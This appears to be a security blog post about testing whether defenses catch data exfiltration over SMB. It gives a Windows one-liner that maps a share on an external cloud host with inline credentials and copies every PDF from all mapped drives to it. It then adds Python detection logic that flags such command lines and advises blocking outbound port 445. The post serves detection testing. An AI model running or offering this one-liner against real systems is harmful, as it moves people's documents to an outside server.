Exfiltration through SMB



The one-liner below is a way to test whether your detection mechanisms catch malware or ransomware that exfiltrates data from mapped drives. You could put it in a .bat file (be sure to double the % on each variable, so %a becomes %%a) or execute it another way, such as a Pastebin command executor.

To use it, set up an SMB server on a host in the cloud and run the one-liner below: it maps that share as R:, finds every PDF document on all of your mapped drives and copies them to the cloud server. Xcopy is installed by default on Windows 10.

net use r: \\yourcloudserver\smb /user:kali\smbuser smbpassword & net use | findstr : | for /f "tokens=1 delims= " %a in ('findstr \') do xcopy %a\*.pdf r:\ /e /s
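If you run this test, the thing to check afterwards is whether your process-creation telemetry (Sysmon Event ID 1, EDR command-line logging) produced an alert on either half of the one-liner. The following is an added example, not code from the original post, showing the kind of detection logic that should fire: it scans constructed command-line log entries for a drive mapped to an SMB host outside your address space with inline credentials, and for a recursive wildcard copy onto a mapped drive. The hostnames, IPs and the internal domain suffix are placeholders you would replace with your own.

```python
"""Detection logic for the exfiltration-through-SMB test.

Added example (not from the original post). It inspects the command-line
field of process-creation events (Sysmon Event ID 1 style) for the two
behaviours the one-liner exhibits: mapping a drive to an external SMB share
with inline credentials, and a recursive wildcard copy onto a mapped drive.
"""
import ipaddress
import re

# Constructed sample command lines; hosts and addresses are placeholders.
SAMPLE_LOGS = [
    r'net use r: \\203.0.113.10\smb /user:kali\smbuser smbpassword',
    r'net use s: \\fileserver01\dept /persistent:yes',
    r'xcopy G:\*.pdf r:\ /e /s',
    r'xcopy C:\Users\alice\report.pdf s:\reports\ ',
    r'net use r: \\10.0.0.5\share',
]

# Address ranges treated as internal (RFC 1918, loopback, link-local).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    '10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16',
    '127.0.0.0/8', '169.254.0.0/16')]
# Assumption: DNS suffixes owned by your organisation.
INTERNAL_SUFFIXES = ('.corp.example',)

NET_USE_RE = re.compile(
    r'^net\s+use\s+(?P<drive>[a-z]:)\s+\\\\(?P<host>[^\\\s]+)\\(?P<share>\S+)'
    r'(?P<rest>.*)$', re.IGNORECASE)
XCOPY_RE = re.compile(
    r'^xcopy\s+(?P<src>\S+)\s+(?P<dst>[a-z]:\\?\S*)(?P<flags>.*)$',
    re.IGNORECASE)


def is_external(host):
    """True if the SMB host is an address or name outside our estate."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP: a dotted name that is not one of our own domains.
        return '.' in host and not host.lower().endswith(INTERNAL_SUFFIXES)
    return not any(addr in net for net in INTERNAL_NETS)


def analyse(cmdline):
    """Return a list of (severity, reason) findings for one command line."""
    findings = []
    line = cmdline.strip()

    m = NET_USE_RE.match(line)
    if m:
        host, rest = m.group('host'), m.group('rest')
        if is_external(host):
            findings.append(('high',
                             f'drive {m.group("drive")} mapped to external SMB host {host}'))
        if re.search(r'/user:', rest, re.IGNORECASE):
            findings.append(('medium', 'inline credentials passed to net use'))

    m = XCOPY_RE.match(line)
    if m:
        src, flags = m.group('src'), m.group('flags').lower()
        recursive = '/s' in flags or '/e' in flags
        if '*' in src and recursive:
            findings.append(('high',
                             f'recursive wildcard copy of {src} to mapped drive {m.group("dst")}'))
    return findings


def scan(lines):
    """Run analyse() over many command lines; returns (line, finding) pairs."""
    return [(line, f) for line in lines for f in analyse(line)]


if __name__ == '__main__':
    for line, (severity, reason) in scan(SAMPLE_LOGS):
        print(f'[{severity}] {reason}\n    {line}')
```

On the sample input this flags the external mapping, the inline credentials and the recursive PDF copy, and stays quiet on the ordinary mapping of an internal file server and the single-file copy. The same two conditions are easy to express as a SIEM rule; the mitigation side is to block outbound TCP 445 at the perimeter so the `net use` fails before any copy starts.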


